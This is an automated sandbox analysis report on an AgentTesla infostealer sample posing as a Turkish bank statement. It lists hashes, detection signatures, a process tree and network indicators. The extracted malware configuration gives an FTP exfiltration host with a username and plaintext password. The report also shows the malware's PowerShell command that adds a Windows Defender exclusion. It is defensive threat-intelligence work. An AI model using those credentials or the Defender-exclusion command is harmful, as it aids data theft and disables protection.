Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi__20241001.exe

Overview

General Information

Sample name:hesaphareketi__20241001.exe
Analysis ID:1524784
MD5:5eaafeca7053687b46ecffad93c82418
SHA1:457566502545fecd8ea9f2249b755135cd03b69b
SHA256:27ff307b514230b2363e2284e1d57df50bc8a59b5cf8c732dc32d5587d472c64
Tags:AgentTeslaexegeoTURuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hesaphareketi__20241001.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: 5EAAFECA7053687B46ECFFAD93C82418)
    • powershell.exe (PID: 6204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2636 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareketi__20241001.exe (PID: 2360 cmdline: "C:\Users\user\Desktop\hesaphareketi__20241001.exe" MD5: 5EAAFECA7053687B46ECFFAD93C82418)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.hesaphareketi__20241001.exe.4bd6010.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.hesaphareketi__20241001.exe.4bd6010.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.hesaphareketi__20241001.exe.4bd6010.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.hesaphareketi__20241001.exe.4bd6010.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x2e6da:$s2: GetPrivateProfileString
                • 0x2ddd1:$s3: get_OSFullName
                • 0x2f384:$s5: remove_Key
                • 0x2f511:$s5: remove_Key
                • 0x30452:$s6: FtpWebRequest
                • 0x311fb:$s7: logins
                • 0x3176d:$s7: logins
                • 0x34450:$s7: logins
                • 0x34530:$s7: logins
                • 0x35e2e:$s7: logins
                • 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
                5.2.hesaphareketi__20241001.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 17 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi__20241001.exe, ParentProcessId: 5732, ParentProcessName: hesaphareketi__20241001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ProcessId: 6204, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi__20241001.exe, ParentProcessId: 5732, ParentProcessName: hesaphareketi__20241001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ProcessId: 6204, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi__20241001.exe, ParentProcessId: 5732, ParentProcessName: hesaphareketi__20241001.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe", ProcessId: 6204, ProcessName: powershell.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
                  Multi AV Scanner detection for domain / URL
                  Source: ftp.normagroup.com.trVirustotal: Detection: 12%Perma Link
                  Source: http://ftp.normagroup.com.trVirustotal: Detection: 12%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: hesaphareketi__20241001.exeReversingLabs: Detection: 75%
                  Source: hesaphareketi__20241001.exeVirustotal: Detection: 27%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: hesaphareketi__20241001.exeJoe Sandbox ML: detected
                  Source: hesaphareketi__20241001.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: hesaphareketi__20241001.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Xk.pdbSHA256 source: hesaphareketi__20241001.exe
                  Source: Binary string: Xk.pdb source: hesaphareketi__20241001.exe

                  Networking

                  barindex
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 104.247.165.99 ports 49744,61673,59991,61434,62425,59911,54398,53275,1,2,53982,49774,50773,51305,60182,21,57937
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.5:49747 -> 104.247.165.99:59911
                  Source: Joe Sandbox ViewIP Address: 104.247.165.99 104.247.165.99
                  Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                  Source: unknownFTP traffic detected: 104.247.165.99:21 -> 192.168.2.5:49746 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: ftp.normagroup.com.tr
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000003014000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002E47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.normagroup.com.tr
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4610095898.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, SKTzxzsJw.cs.Net Code: TFawXa
                  Installs a global keyboard hook
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareketi__20241001.exeJump to behavior
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 0.2.hesaphareketi__20241001.exe.4ade3d0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_015DD5BC0_2_015DD5BC
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D85140_2_055D8514
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D8A280_2_055D8A28
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D00400_2_055D0040
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D00060_2_055D0006
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D8A220_2_055D8A22
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_055D98680_2_055D9868
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075791800_2_07579180
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757A0B80_2_0757A0B8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07575AF00_2_07575AF0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757A9000_2_0757A900
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075749200_2_07574920
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075769D80_2_075769D8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075777000_2_07577700
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075776F00_2_075776F0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075784D00_2_075784D0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075784C30_2_075784C3
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075793D80_2_075793D8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075793C80_2_075793C8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075791700_2_07579170
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075750780_2_07575078
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075770E00_2_075770E0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075750880_2_07575088
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757A0A80_2_0757A0A8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578F700_2_07578F70
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578F6A0_2_07578F6A
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757AE400_2_0757AE40
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757AE300_2_0757AE30
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578D100_2_07578D10
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578D030_2_07578D03
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757EC180_2_0757EC18
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578B700_2_07578B70
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07578B620_2_07578B62
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07575AE10_2_07575AE1
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075749120_2_07574912
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075739180_2_07573918
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075779000_2_07577900
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075799000_2_07579900
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075769090_2_07576909
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075739080_2_07573908
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075769930_2_07576993
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075769850_2_07576985
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075729A20_2_075729A2
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075799AB0_2_075799AB
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075729A80_2_075729A8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075778F00_2_075778F0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_075798F00_2_075798F0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_0757A8F00_2_0757A8F0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A386B00_2_07A386B0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A33D600_2_07A33D60
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A31C880_2_07A31C88
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A31C780_2_07A31C78
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A342700_2_07A34270
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A3425F0_2_07A3425F
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A320B00_2_07A320B0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A320C00_2_07A320C0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A3180B0_2_07A3180B
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 0_2_07A318500_2_07A31850
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C593F85_2_02C593F8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C54A605_2_02C54A60
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C59BB05_2_02C59BB0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C53E485_2_02C53E48
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C5CF205_2_02C5CF20
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C541905_2_02C54190
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_06262EF85_2_06262EF8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_062655885_2_06265588
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_06263DE85_2_06263DE8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_06268A685_2_06268A68
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_0626BBE85_2_0626BBE8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_062600405_2_06260040
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_062699B85_2_062699B8
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_062636505_2_06263650
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_06264EA05_2_06264EA0
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_0626F2685_2_0626F268
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_0626F1805_2_0626F180
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_065795585_2_06579558
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_065795485_2_06579548
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_065731585_2_06573158
                  Source: C:\Users\user\Desktop\hesaphareketi__20241001.exeCode function: 5_2_02C5D2D85_2_02C5D2D8
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2170370887.0000000007650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerS vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2170370887.0000000007650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2171826753.000000000A710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2147318995.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000000.2135243423.0000000000D62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXk.exe2 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000000.00000002.2149506599.00000000032CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608940593.00000000010C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608596388.0000000000BD9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exe, 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exeBinary or memory string: OriginalFilenameXk.exe2 vs hesaphareketi__20241001.exe
                  Source: hesaphareketi__20241001.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.hesaphareketi__20241001.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4b5a1f0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.hesaphareketi__20241001.exe.4bd6010.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
